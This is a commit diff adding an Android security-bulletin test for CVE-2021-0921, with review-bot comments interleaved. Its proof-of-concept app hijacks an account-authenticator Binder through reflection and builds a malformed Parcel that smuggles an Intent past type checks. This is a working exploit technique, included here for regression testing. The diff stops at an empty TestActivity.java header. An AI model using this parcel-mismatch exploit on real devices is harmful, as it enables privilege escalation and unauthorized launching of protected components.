author | Miroslaw Niemiec <mniemiec@google.com> | 2021-09-22 17:03:58 +0000 |
---|---|---|
committer | Miroslaw Niemiec <mniemiec@google.com> | 2021-10-07 23:49:27 +0000 |
commit | 8b3f52fe3965e35f14c1d1d071faf71e1dd39f08 (patch) | |
tree | 60f29ea0970a72e5b71c43bf8e11afd04bbf9d32 | |
parent | 1ac06aad84bd85218d9a41e6df50ece65b621ec8 (diff) | |
download | cts-8b3f52fe3965e35f14c1d1d071faf71e1dd39f08.tar.gz |
STS test for Android Security CVE-2021-0921
Test: sts-tradefed run sts-engbuild-no-spl-lock -m CtsSecurityBulletinHostTestCases -t android.security.cts.CVE_2021_0921
Bug: 199779591
Bug: 195962697
Change-Id: Ie5505d4d8d42bc5269d7ef6de9d185ef19f9bcd3
Merged-In: Ie5505d4d8d42bc5269d7ef6de9d185ef19f9bcd3
14 files changed, 741 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java new file mode 100644 index 00000000000..27900e19fcb --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java 
@@ -0,0 +1,68 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.AppModeFull; +import android.util.Log; +import android.platform.test.annotations.AsbSecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test; +import com.android.tradefed.log.LogUtil.CLog; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import static org.junit.Assert.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2021_0921 extends BaseHostJUnit4Test { + private static final String TEST_PKG = "android.security.cts.CVE_2021_0921"; + private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest"; + private static final String TEST_APP = "CVE-2021-0921.apk"; + + @Before + public void setUp() throws Exception { + uninstallPackage(getDevice(), TEST_PKG); + } + + @Test + @AsbSecurityTest(cveBugId = 195962697) + @AppModeFull + public void testRunDeviceTest() throws Exception { + + CLog.i("testRunDeviceTest() start"); + installPackage(); + + //ensure the screen is woken up. 
+ //KEYCODE_WAKEUP wakes up the screen + //KEYCODE_MENU called twice unlocks the screen (if locked) + getDevice().executeShellCommand("input keyevent KEYCODE_WAKEUP"); + getDevice().executeShellCommand("input keyevent KEYCODE_MENU"); + getDevice().executeShellCommand("input keyevent KEYCODE_HOME"); + getDevice().executeShellCommand("input keyevent KEYCODE_MENU"); + + //run the test + Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "test")); + CLog.i("testRunDeviceTest() end"); + } + + private void installPackage() throws Exception { + installPackage(TEST_APP, new String[0]); + } +} + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk new file mode 100644 index 00000000000..57296eb1390 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk 
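Review bot: The PoC APK is removed only in setUp(), so when testRunDeviceTest() finishes the device keeps an exported account-authenticator service and an exported TestActivity installed, and the `org.junit.After` import in this hunk is never used. Add a teardown that mirrors setUp so the package is gone regardless of how the test ends: `@After public void tearDown() throws Exception { uninstallPackage(getDevice(), TEST_PKG); }`. The `android.util.Log` import and the wildcard `org.junit.Assert.*` next to the explicit `org.junit.Assert` import are also unused and can be dropped.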
@@ -0,0 +1,36 @@ +# Copyright (C) 2021 The Android Open Source Project +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +LOCAL_PATH := $(call my-dir) +include $(CLEAR_VARS) + +LOCAL_PACKAGE_NAME := CVE-2021-0921 +LOCAL_SRC_FILES := $(call all-java-files-under, src) +LOCAL_MODULE_TAGS := tests +LOCAL_SDK_VERSION := current +LOCAL_STATIC_JAVA_LIBRARIES := androidx.test.core +LOCAL_STATIC_JAVA_LIBRARIES += androidx.test.rules +LOCAL_STATIC_JAVA_LIBRARIES += ub-uiautomator + +# Tag this module as a cts test artifact +LOCAL_COMPATIBILITY_SUITE := cts vts sts + +LOCAL_PROGUARD_ENABLED := disabled +LOCAL_DEX_PREOPT := false +include $(BUILD_CTS_SUPPORT_PACKAGE) + + + + + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml new file mode 100644 index 00000000000..2e81b866e48 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml 
@@ -0,0 +1,57 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + --> + +<manifest xmlns:android="http://schemas.android.com/apk/res/android" + xmlns:tools="http://schemas.android.com/tools" + package="android.security.cts.CVE_2021_0921" + android:targetSandboxVersion="2"> + + <application> + <uses-library android:name="android.test.runner"/> + + <activity android:name=".AuthenticatorActivity" android:exported="true"> + <intent-filter> + <action android:name="android.intent.action.MAIN" /> + <category android:name="android.intent.category.LAUNCHER" /> + </intent-filter> + </activity> + + <activity android:name=".TestActivity" android:exported="true"> + <intent-filter> + <action android:name="android.intent.action.RUN"/> + <category android:name="android.intent.category.DEFAULT"/> + </intent-filter> + </activity> + + <service + android:name=".AuthenticatorService" + android:enabled="true" + android:exported="true"> + <intent-filter> + <action android:name="android.accounts.AccountAuthenticator" /> + </intent-filter> + + <meta-data + android:name="android.accounts.AccountAuthenticator" + android:resource="@xml/authenticator" /> + </service> + </application> + + <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner" + android:targetPackage="android.security.cts.CVE_2021_0921" /> + +</manifest> 
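Review bot: The `<intent-filter>` on `.TestActivity` (action RUN, category DEFAULT) is not needed and widens the attack surface of the test APK: Trigger.java builds the forged intent with an explicit component (`new Intent(mContext, TestActivity.class)`), so no filter takes part in resolving it, while the filter lets any app on the device start the activity and trip its assertion. Keep the activity exported, since the launch is expected to arrive from another package, but drop the filter: `<activity android:name=".TestActivity" android:exported="true" />`. The `xmlns:tools` namespace is declared but never used and can go as well.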
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml new file mode 100644 index 00000000000..09d024c301f --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml @@ -0,0 +1,26 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- + Copyright 2021 The Android Open Source Project + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + --> + +<LinearLayout + xmlns:android="http://schemas.android.com/apk/res/android" + android:layout_width="match_parent" + android:layout_height="match_parent"> + <TextView + android:layout_width="match_parent" + android:layout_height="match_parent" + android:text="CVE-2021-0921"/> +</LinearLayout> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml new file mode 100644 index 00000000000..69b22338c65 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<resources> + <color name="colorPrimary">#008577</color> + <color name="colorPrimaryDark">#00574B</color> + <color name="colorAccent">#D81B60</color> +</resources> 
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml new file mode 100644 index 00000000000..1a689a5305b --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml @@ -0,0 +1,3 @@ +<resources> + <string name="app_name">AnyIntentPoc</string> +</resources> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml new file mode 100644 index 00000000000..46194d5022f --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml @@ -0,0 +1,5 @@ +<?xml version="1.0" encoding="utf-8"?> +<account-authenticator + xmlns:android="http://schemas.android.com/apk/res/android" + android:accountType="android.security.cts" + android:label="@string/app_name"/> diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java new file mode 100644 index 00000000000..4d4ad986f2b --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java 
@@ -0,0 +1,157 @@ +package android.security.cts.CVE_2021_0921; + +import android.accounts.AbstractAccountAuthenticator; +import android.accounts.Account; +import android.accounts.AccountAuthenticatorResponse; +import android.annotation.SuppressLint; +import android.content.Context; +import android.content.Intent; +import android.os.Bundle; +import android.os.IBinder; +import android.os.IInterface; +import android.os.Parcel; +import android.os.RemoteException; +import android.util.Log; + +import java.io.FileDescriptor; +import java.lang.reflect.Field; + +public class Authenticator extends AbstractAccountAuthenticator { + public static Intent mIntent; + private int TRANSACTION_onResult; + private IBinder mOriginRemote; + private static final String TAG = "TAG_2021_0921.Authenticator"; + private IBinder mProxyRemote = new IBinder() { + @Override + public String getInterfaceDescriptor() throws RemoteException { + return null; + } + + @Override + public boolean pingBinder() { + return false; + } + + @Override + public boolean isBinderAlive() { + return false; + } + + @Override + public IInterface queryLocalInterface(String descriptor) { + return null; + } + + @Override + public void dump(FileDescriptor fd, String[] args) throws RemoteException { + } + + @Override + public void dumpAsync(FileDescriptor fd, String[] args) throws RemoteException { + } + + @Override + public boolean transact(int code, Parcel data, Parcel reply, int flags) throws RemoteException { + Log.d(TAG, "transact() start"); + if (code == TRANSACTION_onResult) { + Log.d(TAG, "transact() before parse"); + data.recycle(); + data = GenMalformedParcel.parsingPackageImplParcel(mIntent); + Log.d(TAG, "transact() end parse"); + } + Log.d(TAG, "transact() continue"); + mOriginRemote.transact(code, data, reply, flags); + Log.d(TAG, "transact() end"); + return true; + } + + @Override + public void linkToDeath(DeathRecipient recipient, int flags) throws RemoteException { + } + + @Override + public boolean 
unlinkToDeath(DeathRecipient recipient, int flags) { + return false; + } + }; + + public Authenticator(Context context) { + super(context); + Log.d(TAG, "Authenticator() constructor"); + } + + @Override + public String getAuthTokenLabel(String authTokenType) { + return null; + } + + @Override + public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) { + return null; + } + + @Override + public Bundle getAuthToken(AccountAuthenticatorResponse response, Account account, + String authTokenType, Bundle options) { + return null; + } + + @Override + public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, + String authTokenType, String[] requiredFeatures, Bundle options) { + + Log.d(TAG, "addAccount() start"); + try { + Class AccountAuthenticatorResponseClass = Class.forName("android.accounts.AccountAuthenticatorResponse"); + @SuppressLint("SoonBlockedPrivateApi") + Field mAccountAuthenticatorResponseField = AccountAuthenticatorResponseClass.getDeclaredField("mAccountAuthenticatorResponse"); + mAccountAuthenticatorResponseField.setAccessible(true); + Object mAccountAuthenticatorResponse = mAccountAuthenticatorResponseField.get(response); + + Class stubClass = null; + for (Class inner : Class.forName("android.accounts.IAccountAuthenticatorResponse").getDeclaredClasses()) { + if (inner.getCanonicalName().equals("android.accounts.IAccountAuthenticatorResponse.Stub")) { + stubClass = inner; + break; + } + } + + Field TRANSACTION_onResultField = stubClass.getDeclaredField("TRANSACTION_onResult"); + TRANSACTION_onResultField.setAccessible(true); + TRANSACTION_onResult = TRANSACTION_onResultField.getInt(null); + + Class proxyClass = null; + for (Class inner : stubClass.getDeclaredClasses()) { + if (inner.getCanonicalName().equals("android.accounts.IAccountAuthenticatorResponse.Stub.Proxy")) { + proxyClass = inner; + break; + } + } + + Field mRemoteField = proxyClass.getDeclaredField("mRemote"); + 
mRemoteField.setAccessible(true); + mOriginRemote = (IBinder) mRemoteField.get(mAccountAuthenticatorResponse); + mRemoteField.set(mAccountAuthenticatorResponse, mProxyRemote); + } catch (Exception e) { + e.printStackTrace(); + } + Log.d(TAG, "addAccount() end"); + + return new Bundle(); + } + + @Override + public Bundle confirmCredentials(AccountAuthenticatorResponse response, Account account, Bundle options) { + return null; + } + + @Override + public Bundle updateCredentials(AccountAuthenticatorResponse response, Account account, String authTokenType, Bundle options) { + return null; + } + + @Override + public Bundle hasFeatures(AccountAuthenticatorResponse response, Account account, String[] features) { + return null; + } +} diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java new file mode 100644 index 00000000000..41e30eb5ca0 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java @@ -0,0 +1,31 @@ +package android.security.cts.CVE_2021_0921; + +import android.content.Context; +import android.app.Activity; +import android.os.Build; +import android.os.Bundle; +import android.util.Log; + +public class AuthenticatorActivity extends Activity { + + private static final String TAG = "TAG_2021_0921.AuthenticatorActivity"; + + @Override + protected void onCreate(Bundle savedInstanceState) { + super.onCreate(savedInstanceState); + Log.d(TAG, "onCreate() start"); + setContentView(R.layout.activity_main); + new Trigger(AuthenticatorActivity.this).accountSettings(); + Log.d(TAG, "onCreate() end"); + } + + @Override + protected void onResume() { + super.onResume(); + this.finish(); + } +} + + + + 
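Review bot: `transact()` calls `data.recycle()` on a Parcel it did not obtain, then returns `true` without ever recycling the replacement it got from `GenMalformedParcel.parsingPackageImplParcel()`. The caller of this IBinder is the AIDL-generated `IAccountAuthenticatorResponse.Stub.Proxy`, which presumably recycles its own request Parcel after the call, so the same Parcel would be recycled twice and can be handed out twice from the pool while the forged one leaks; leave the caller's Parcel alone and recycle only the one this code owns, as below (the Log.d calls are omitted and the real transact result is returned instead of a constant `true`). Separately, the reflection block in addAccount() swallows every exception with `printStackTrace()`: if hidden-API enforcement blocks `mRemote` or `mAccountAuthenticatorResponse`, the proxy is never installed and the host test passes vacuously, so rethrow with `throw new IllegalStateException("CVE-2021-0921 PoC setup failed", e);` to keep a setup failure distinguishable from a patched device.
```java
@Override
public boolean transact(int code, Parcel data, Parcel reply, int flags) throws RemoteException {
    if (code != TRANSACTION_onResult) {
        return mOriginRemote.transact(code, data, reply, flags);
    }
    // 'data' belongs to the calling Proxy, which recycles it itself; only the forged Parcel is ours.
    Parcel forged = GenMalformedParcel.parsingPackageImplParcel(mIntent);
    try {
        return mOriginRemote.transact(code, forged, reply, flags);
    } finally {
        forged.recycle();
    }
}
```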
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java
new file mode 100644
index 00000000000..917056239bb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java
@@ -0,0 +1,15 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.app.Service;
+import android.content.Intent;
+import android.os.IBinder;
+
+public class AuthenticatorService extends Service {
+ public AuthenticatorService() {
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return new Authenticator(this).getIBinder();
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
new file mode 100644
index 00000000000..51733ef15cf
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
@@ -0,0 +1,63 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts.CVE_2021_0921; + +import org.junit.Test; +import org.junit.runner.RunWith; + +import android.content.Context; +import android.content.Intent; +import android.content.pm.PackageManager; +import android.os.SystemClock; +import android.util.Log; +import android.support.test.uiautomator.UiDevice; +import androidx.test.runner.AndroidJUnit4; + +import static androidx.test.core.app.ApplicationProvider.getApplicationContext; +import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation; +import static org.junit.Assert.assertFalse; + +@RunWith(AndroidJUnit4.class) +public class DeviceTest { + + private static final String TAG = "TAG_2021_0921.DeviceTest"; + private UiDevice mDevice; + + @Test + public void test() { + Log.d(TAG, "test() start"); + + //set mDevice and go to homescreen + mDevice = UiDevice.getInstance(getInstrumentation()); + mDevice.pressHome(); + Context context = getApplicationContext(); + String TEST_PACKAGE = "android.security.cts.CVE_2021_0921"; + PackageManager packageManager = context.getPackageManager(); + + //start poc app + Intent intent = packageManager.getLaunchIntentForPackage(TEST_PACKAGE); + intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK); + intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + context.startActivity(intent); + + //wait for poc app to complete 
(it takes about 6 seconds) + SystemClock.sleep(20000); + + Log.d(TAG, "test() end"); + } +} + diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java new file mode 100644 index 00000000000..ff0bb62e928 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java 
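Review bot: `packageManager.getLaunchIntentForPackage(TEST_PACKAGE)` can return null, and the following `intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK)` would then surface as a NullPointerException rather than a readable failure; add `assertNotNull("no launch intent for " + TEST_PACKAGE, intent);` before the flags are set. The test body asserts nothing itself — the verdict comes from the `Assert.fail` in TestActivity.onCreate(), presumably reported by the instrumentation as an uncaught exception in the test process — so a one-line comment above the sleep stating that would help the next reader. The `assertFalse` static import is unused, and `SystemClock.sleep(20000)` is a fixed 20 s wait while the comment says the PoC completes in about 6 s; polling for the activity instead of sleeping would make the test both shorter and less timing-dependent.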
@@ -0,0 +1,210 @@ +package android.security.cts.CVE_2021_0921; + +import android.accounts.AccountManager; +import android.content.Intent; +import android.os.Binder; +import android.os.Bundle; +import android.os.Parcel; +import android.util.Log; + +public class GenMalformedParcel { + + private static final String TAG = "TAG_2021_0921.GenMalformedParcel"; + + public static Parcel parsingPackageImplParcel(Intent intent) { + Log.d(TAG, "parsingPackageImplParcel() start"); + + Parcel data = Parcel.obtain(); + data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse"); + data.writeInt(1); + int bundleLenPos = data.dataPosition(); + data.writeInt(0); + data.writeInt(0x4C444E42); + int bundleStartPos = data.dataPosition(); + data.writeInt(3); + + data.writeString("key1"); + data.writeInt(4); + data.writeString("android.content.pm.parsing.ParsingPackageImpl"); + + data.writeInt(0); // supportsSmallScreens + data.writeInt(0); // supportsNormalScreens + data.writeInt(0); // supportsLargeScreens + data.writeInt(0); // supportsExtraLargeScreens + data.writeInt(0); // resizeable + data.writeInt(0); // anyDensity + data.writeInt(0); // versionCode + data.writeInt(0); // versionCodeMajor + data.writeInt(0); // baseRevisionCode + data.writeString("versionName"); // versionName + data.writeInt(0); // compileSdkVersion + data.writeString("compileSdkVersionCodeName"); // compileSdkVersionCodeName + data.writeString("packageName"); // packageName + data.writeString("realPackage"); // realPackage + data.writeString("baseCodePath"); // baseCodePath + data.writeInt(false ? 1 : 0); // requiredForAllUsers + data.writeString("restrictedAccountType"); // restrictedAccountType + data.writeString("requiredAccountType"); // requiredAccountType + data.writeString("overlayTarget"); // overlayTarget + data.writeString("overlayTargetName"); // overlayTargetName + data.writeString("overlayCategory"); // overlayCategory + data.writeInt(0); // overlayPriority + data.writeInt(false ? 
1 : 0); // overlayIsStatic + data.writeInt(0); // overlayables + data.writeString("staticSharedLibName"); // staticSharedLibName + data.writeLong(0); // staticSharedLibVersion + data.writeInt(0); // libraryNames + data.writeInt(0); // usesLibraries + data.writeInt(0); // usesOptionalLibraries + data.writeInt(0); // usesStaticLibraries + data.writeInt(0); // usesStaticLibrariesVersions + data.writeInt(0); // digestsSize + data.writeString("sharedUserId"); // sharedUserId + data.writeInt(0); // sharedUserLabel + data.writeInt(0); // configPreferences + data.writeInt(0); // reqFeatures + data.writeInt(0); // featureGroups + data.writeInt(0); // restrictUpdateHash + data.writeInt(0); // originalPackages + data.writeInt(0); // adoptPermissions + data.writeInt(0); // requestedPermissions + data.writeInt(0); // implicitPermissions + data.writeInt(0); // upgradeKeySets + data.writeInt(0); // keySetMapping + data.writeInt(0); // protectedBroadcasts + data.writeInt(0); // activities + data.writeInt(0); // receivers + data.writeInt(0); // services + data.writeInt(0); // providers + data.writeInt(0); // attributions + data.writeInt(0); // permissions + data.writeInt(0); // permissionGroups + data.writeInt(0); // instrumentations + data.writeInt(0); // preferredActivityFilters + data.writeInt(0); // processes + data.writeInt(0); // metaData + data.writeString("volumeUuid"); // volumeUuid + data.writeInt(-1); // signingDetails + data.writeString("codePath"); // codePath + data.writeInt(false ? 1 : 0); // use32BitAbi + data.writeInt(false ? 1 : 0); // visibleToInstantApps + data.writeInt(false ? 
1 : 0); // forceQueryable + + data.writeInt(1); // queriesIntents + data.writeInt(0); // queriesIntents + + data.writeInt(0); // queriesPackages + data.writeInt(0); // queriesProviders + data.writeString(""); // appComponentFactory + data.writeString(""); // backupAgentName + data.writeInt(-1); // banner + data.writeInt(0); // category + data.writeString(""); // classLoaderName + data.writeString("className"); // className + data.writeInt(-1); // compatibleWidthLimitDp + data.writeInt(0); // descriptionRes + data.writeInt(false ? 1 : 0); // enabled + data.writeInt(false ? 1 : 0); // crossProfile + data.writeInt(0); // fullBackupContent + data.writeInt(0); // iconRes + data.writeInt(0); // installLocation + + data.writeInt(0); // labelRes -> queriesPackages + data.writeInt(0); // largestWidthLimitDp -> queriesProviders + data.writeInt(-1); // logo -> appComponentFactory + data.writeString("manageSpaceActivityName"); // manageSpaceActivityName -> backupAgentName + data.writeFloat(0); // maxAspectRatio -> banner + data.writeFloat(0); // minAspectRatio -> category + data.writeInt(-1); // minSdkVersion -> classLoaderName + data.writeInt(-1); // networkSecurityConfigRes -> className + data.writeInt(1); // nonLocalizedLabel -> compatibleWidthLimitDp + data.writeInt(-1); // nonLocalizedLabel -> descriptionRes + data.writeInt(-1); // permission -> enabled + data.writeInt(-1); // processName -> crossProfile + data.writeInt(0); // requiresSmallestWidthDp -> fullBackupContent + data.writeInt(0); // roundIconRes -> iconRes + data.writeInt(0); // targetSandboxVersion -> installLocation + data.writeInt(0); // targetSdkVersion -> labelRes + data.writeInt(-1); // taskAffinity -> largestWidthLimitDp + data.writeInt(0); // theme -> logo + data.writeInt(-1); // uiOptions -> manageSpaceActivityName + data.writeInt(-1); // zygotePreloadName -> maxAspectRatio + data.writeInt(0); // splitClassLoaderNames -> minAspectRatio + data.writeInt(0); // splitCodePaths -> minSdkVersion + 
data.writeInt(0); // splitDependencies -> networkSecurityConfigRes + data.writeInt(0); // splitFlags -> nonLocalizedLabel + data.writeInt(-1); // splitNames -> nonLocalizedLabel + data.writeInt(-1); // splitRevisionCodes -> permission + data.writeInt(false ? 1 : 0); // externalStorage -> processName + data.writeInt(false ? 1 : 0); // baseHardwareAccelerated -> processName + data.writeInt(true ? 1 : 0); // allowBackup -> requiresSmallestWidthDp + data.writeInt(false ? 1 : 0); // killAfterRestore -> roundIconRes + data.writeInt(false ? 1 : 0); // restoreAnyVersion -> targetSandboxVersion + data.writeInt(false ? 1 : 0); // fullBackupOnly -> targetSdkVersion + data.writeInt(false ? 1 : 0); // persistent -> taskAffinity + data.writeInt(false ? 1 : 0); // debuggable -> taskAffinity + data.writeInt(false ? 1 : 0); // vmSafeMode -> theme + data.writeInt(false ? 1 : 0); // hasCode -> uiOptions + data.writeInt(false ? 1 : 0); // allowTaskReparenting -> zygotePreloadName + data.writeInt(false ? 1 : 0); // allowClearUserData -> zygotePreloadName + data.writeInt(false ? 1 : 0); // largeHeap -> splitClassLoaderNames + data.writeInt(false ? 1 : 0); // usesCleartextTraffic -> splitCodePaths + data.writeInt(false ? 1 : 0); // supportsRtl -> splitDependencies + data.writeInt(false ? 1 : 0); // testOnly -> splitFlags + data.writeInt(false ? 1 : 0); // multiArch -> splitNames + data.writeInt(false ? 1 : 0); // extractNativeLibs -> splitRevisionCodes + data.writeInt(false ? 1 : 0); // game -> externalStorage + data.writeInt(false ? 1 : 0); // resizeableActivity -> baseHardwareAccelerated + data.writeInt(false ? 1 : 0); // staticSharedLibrary -> allowBackup + data.writeInt(false ? 1 : 0); // overlay -> killAfterRestore + data.writeInt(false ? 1 : 0); // isolatedSplitLoading -> restoreAnyVersion + data.writeInt(false ? 1 : 0); // hasDomainUrls -> fullBackupOnly + data.writeInt(false ? 1 : 0); // profileableByShell -> persistent + data.writeInt(false ? 
1 : 0); // backupInForeground -> debuggable + data.writeInt(false ? 1 : 0); // useEmbeddedDex -> vmSafeMode + data.writeInt(false ? 1 : 0); // defaultToDeviceProtectedStorage -> hasCode + data.writeInt(false ? 1 : 0); // directBootAware -> allowTaskReparenting + data.writeInt(false ? 1 : 0); // partiallyDirectBootAware -> allowClearUserData + data.writeInt(false ? 1 : 0); // resizeableActivityViaSdkVersion -> largeHeap + data.writeInt(false ? 1 : 0); // allowClearUserDataOnFailedRestore -> usesCleartextTraffic + data.writeInt(false ? 1 : 0); // allowAudioPlaybackCapture -> supportsRtl + data.writeInt(false ? 1 : 0); // requestLegacyExternalStorage -> testOnly + data.writeInt(false ? 1 : 0); // usesNonSdkApi -> multiArch + data.writeInt(false ? 1 : 0); // hasFragileUserData -> extractNativeLibs + data.writeInt(false ? 1 : 0); // cantSaveState -> game + data.writeInt(false ? 1 : 0); // allowNativeHeapPointerTagging -> resizeableActivity + data.writeInt(0); // autoRevokePermissions -> staticSharedLibrary + data.writeInt(false ? 
1 : 0); // preserveLegacyExternalStorage -> overlay + data.writeInt(0); // mimeGroups -> isolatedSplitLoading + data.writeInt(0); // gwpAsanMode -> hasDomainUrls + data.writeInt(0); // minExtensionVersions -> profileableByShell + + data.writeString("key2"); + data.writeInt(-1); + + data.writeString("key3"); + data.writeInt(13); + int byteArrayLenPos = data.dataPosition(); + data.writeInt(0); + int byteArrayStartPos = data.dataPosition(); + for (int i = 0; i < 7; i++) { + data.writeInt(0); + } + data.writeString(AccountManager.KEY_INTENT); + data.writeInt(4); + data.writeString("android.content.Intent"); + intent.writeToParcel(data, 0); + int byteArrayEndPos = data.dataPosition(); + data.setDataPosition(byteArrayLenPos); + int byteArrayLen = byteArrayEndPos - byteArrayStartPos; + data.writeInt(byteArrayLen); + data.setDataPosition(byteArrayEndPos); + int bundleEndPos = data.dataPosition(); + data.setDataPosition(bundleLenPos); + int bundleLen = bundleEndPos - bundleStartPos; + data.writeInt(bundleLen); + data.setDataPosition(bundleEndPos); + Log.d(TAG, "parsingPackageImplParcel() end"); + return data; + } +} diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java new file mode 100644 index 00000000000..5fe3acfc869 --- /dev/null +++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java 
